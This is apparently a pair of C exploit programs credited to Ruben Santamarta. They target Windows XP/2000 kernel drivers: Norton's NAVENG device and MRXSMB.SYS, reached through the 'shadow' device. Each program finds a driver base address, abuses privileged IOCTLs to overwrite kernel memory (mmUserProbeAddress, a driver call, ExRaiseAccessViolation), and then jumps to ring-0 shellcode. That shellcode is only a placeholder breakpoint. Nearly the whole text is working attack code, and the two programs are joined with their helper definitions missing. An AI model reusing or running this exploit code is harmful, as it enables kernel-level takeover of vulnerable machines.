int main(int argc, char *argv[])
{
DWORD *OutBuff,*InBuff,Ring0Addr,mmUserProbe;
DWORD dwIOCTL,OutSize,InSize,junk,cb,devNum,i,ShellAddr,hValue;
HANDLE hDevice;
PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME pGetDeviceDriverBaseName;
LPVOID arrMods[200],addEx;
DWORD BaseNt=0,BaseAuxNt;
BOOL InXP;
CHAR baseName[MAX_PATH];
unsigned char Ring0ShellCode[]="\xcc"; //"PUT YOUR RING0 CODE HERE "
system("cls");
printf("\n################################\n");
printf("## Norton I.S ##\n");
printf("## Ring0 Exploit ##\n");
printf("################################\n");
printf("\nRuben Santamarta\nwww.reversemode.com\n\n");
if(argc<2)
{
printf("\nusage> exploit.exe <XP> or <2K>\n");
exit(1);
}
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("\n[!] Searching Ntoskrnl.exe Base Address...");
for(i=0; i<=devNum; i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
if((strncmp(baseName,"ntoskr",6)==0))
{
printf("[%x] Found!\n",arrMods[i]);
BaseNt = (DWORD)arrMods[i];
BaseAuxNt=BaseNt;
}
}
if (!BaseNt)
{
printf("!!? ntoskrnl.exe base address not found\nexiting\n\n");
exit(0);
}
if(strncmp(argv[1],"XP",2)==0) InXP = TRUE;
else InXP = FALSE;
//////////////////////////////////////
////// STAGE 1
//////////////////////////////////////
if(InXP) BaseNt += WXP_USERPROBE;
else BaseNt += W2K_USERPROBE;
//////////////////////
///// CASE 'DosDevice'
//////////////////////
hDevice = CreateFile("\\\\.\\NAVENG",
0,
0,
NULL,
3,
0,
0);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("\n\n** Initializing Exploit\t[Stage 1]\n\n");
printf("\nINFORMATION \n");
printf("-----------------------------------------------------\n");
printf("[!] NAVENG Device Handle [%x]\n",hDevice);
//////////////////////
///// BUFFERS
//////////////////////
OutSize = 4;
OutBuff = malloc(sizeof(DWORD));
//////////////////////
///// IOCTL
//////////////////////
dwIOCTL = 0x222ADB;
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)OutBuff,OutSize,
&junk,
NULL);
printf("[!] mmUserProbeAddress current value:\t[0x7FFF0000]\n");
printf("[!] Overwriting mmUserProbeAddress at:\t[0x%x] \n",BaseNt);
printf("[!] mmUserProbeAddress current value:\t[0x%x]\n",OutBuff[0]);
printf("[*] ProbeForWrite now checking for values greater than 0x%x\n\n",OutBuff[0]);
DeviceIoControl(hDevice,
dwIOCTL,
(LPVOID)0,0,
(LPVOID)BaseNt,OutSize,
&junk,
NULL);
mmUserProbe=OutBuff[0];
free((LPVOID)OutBuff);
CloseHandle(hDevice);
//////////////////////
///// STAGE 2
//////////////////////
BaseNt = BaseAuxNt;
/////////////////////////
printf("\n\n** Initializing Exploit\t[Stage 2]\n\n");
addEx=(LPVOID)CalcJump(BaseNt,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError();
InBuff=OutBuff;
printf("[!] Checking Shadow Device...");
hDevice = CreateFile("\\\\.\\shadow",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]\n");
printf("[!] Exploiting Shadow Device...\n");
while(OutBuff[3]< hValue)
{
DeviceIoControl(hDevice, // "\\.\shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
}
if(InXP) Ring0Addr = BaseNt + WXP_EXCEPTION;
else Ring0Addr = BaseNt + W2K_EXCEPTION;
printf("\n[!] Overwriting ExRaiseAccessViolation at [0x%x]...",Ring0Addr+0xC);
DeviceIoControl(hDevice, // "\\.\shadow"
0x141043, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("[OK]");
printf("\n\n\t\t[!] Initializing Countdown,last chance to abort.");
for(i=1; i<0x3C00; i++) OutBuff[i]=0x90909090; // paged out
memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
for(i=10; i>=1; i--)
{
printf("\r -[ %d ]- ",i);
if(i==1) printf("\n\n[*] Executing ShellCode");
Sleep(1000);
}
DeviceIoControl(hDevice,
0x141043,
InBuff, 2,
(LPVOID)mmUserProbe+0x1000, 0x18,
&junk,
(LPOVERLAPPED) NULL);
CloseHandle(hDevice);
printf("\n\n[*] Exploit terminated\n\n");
/////////////////////
///// CLeanUp
/////////////////////
free(OutBuff);
return 0;
}
int main(int argc, char *argv[])
{
PENUMDEVICES pEnumDeviceDrivers;
PGETDEVNAME pGetDeviceDriverBaseName;
LPVOID arrMods[200],addEx;
DWORD cb,i,devNum,dwTemp,hValue,Ring0Addr,junk,ShellAddr,BaseMRX=0;
DWORD *OutBuff,*InBuff;
HANDLE hDevice;
BOOL InXP;
CHAR baseName[255];
CONST CHAR Ring0ShellCode[]="\xCC"; //"PUT YOUR RING0 CODE HERE :)"
if(argc<2)
{
printf("\nMRXSMB.SYS RING0 Exploit\n");
printf("--- Ruben Santamarta ---\n");
printf("Tested on XPSP2 & W2KSP4\n");
printf("\nusage> exploit.exe <XP> or <2K>\n");
exit(1);
}
if(strncmp(argv[1],"XP",2)==0)
InXP=TRUE;
else
InXP=FALSE;
pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
"EnumDeviceDrivers");
pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
"GetDeviceDriverBaseNameA");
pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
devNum=cb/sizeof(LPVOID);
printf("\nSearching Mrxsmb.sys Base Address...");
for(i=1;i<=devNum;i++)
{
pGetDeviceDriverBaseName(arrMods[i],baseName,254);
if((strncmp(baseName,"mrxsmb",6)==0))
{
printf("[%x] Found!\n",arrMods[i]);
BaseMRX=(DWORD)arrMods[i];
}
}
if(!BaseMRX)
{
printf("Not Found\nExiting\n\n");
exit(1);
}
addEx=(LPVOID)CalcJump(BaseMRX,InXP,&hValue,&ShellAddr);
OutBuff=(DWORD*)VirtualAlloc((LPVOID)addEx,0xF000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!OutBuff) ShowError();
printf("F000h bytes allocated at \t\t [0x%p]\n",addEx);
printf("Value needed \t\t\t [0x%p]\n",hValue+4);
InBuff=OutBuff;
printf("Checking Shadow Device...");
hDevice = CreateFile("\\\\.\\shadow",
FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hDevice == INVALID_HANDLE_VALUE) ShowError();
printf("[OK]\n");
printf("Querying Device...\n");
while(OutBuff[3]< hValue)
{
DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("\r\t[->]VALUES: (%x)",OutBuff[3]);
}
if(InXP)
Ring0Addr=BaseMRX+XPSP2;
else
Ring0Addr=BaseMRX+W2KSP4;
printf("Overwritting Driver Call at[%x]...",Ring0Addr);
DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
(LPVOID)Ring0Addr, 0x18,// OutBuffer,OutBufferSize 0x
&junk, // bytes returned
(LPOVERLAPPED) NULL);
printf("[OK]\n");
for(i=1;i<0x3C00;i++) OutBuff[i]=0x90909090;
memcpy((LPVOID*)ShellAddr,(LPVOID*)Ring0ShellCode,sizeof(Ring0ShellCode));
printf("Sending IOCTL to execute the ShellCode\n");
DeviceIoControl(hDevice, // "\\.\shadow"
MAGIC_IOCTL, // Privileged IOCTL
InBuff, 2, // InBuffer, InBufferSize
OutBuff, 0x18,// OutBuffer,OutBufferSize
&junk, // bytes returned
(LPOVERLAPPED) NULL);
dwTemp=CloseHandle(hDevice);
if(!dwTemp) ShowError();
dwTemp=VirtualFree(OutBuff,0xf000,MEM_DECOMMIT);
if(!dwTemp) ShowError();
return(1);
}
